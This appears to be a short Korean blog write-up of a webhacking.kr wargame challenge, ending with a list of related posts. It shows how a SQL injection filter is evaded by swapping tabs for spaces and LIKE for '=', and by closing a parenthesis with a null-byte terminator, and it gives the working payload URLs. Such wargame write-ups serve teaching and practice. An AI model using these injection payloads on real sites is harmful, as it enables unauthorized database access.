SMALL
이번문제는
필터 되는 부분 : #, select , ( , 띄어쓰기, limit, = , 0x
get 파라미터명 : no
해결해야 되는 부분 : id가 admin 인 경우 클리어
처음에 입력 폼에 2%09or%09no%3d2 이렇게 띄워쓰기 대신 탭문자 와 = urlencode 해서 넣어보았는데
urlencode 가 한번 더 되어나타난다.
그래서 url에 직접 get 파라미터 값을 넣어줬더니
정상적으로 들어가지만 =(%3d) 가 필터되어 이것을 처리해주는 방법을 고민해 봐야겠다.
?no=2%09or%09id%09like%09%22admin%22
?no=2%09or%09no%09like%092
?no=2%09or%09no%09like%090b00000010빈칸은 탭으로 처리해주고 = 은 LIKE문으로 우회했는데 결과는 guset?!
계속 삽질중 알고보니 ()로 묶여있다는 사실을 알게되고 다시 페이로드를 짜기 시작했다.
?no=2)%09or%09no%09like%092;%00
클리어!
'Network > Webhacking.kr' 카테고리의 다른 글
| [webhacking.kr] Challenge(old)_32[150] (0) | 2019.10.14 |
|---|---|
| [webhacking.kr] Challenge(old)_31[150] (0) | 2019.10.14 |
| [webhacking.kr] Challenge(old)_25[150] (3) | 2019.10.14 |
| [webhacking.kr] Challenge(old)_19[150] (0) | 2019.10.14 |
| [webhacking.kr] Challenge(old)_54[100] (0) | 2019.10.14 |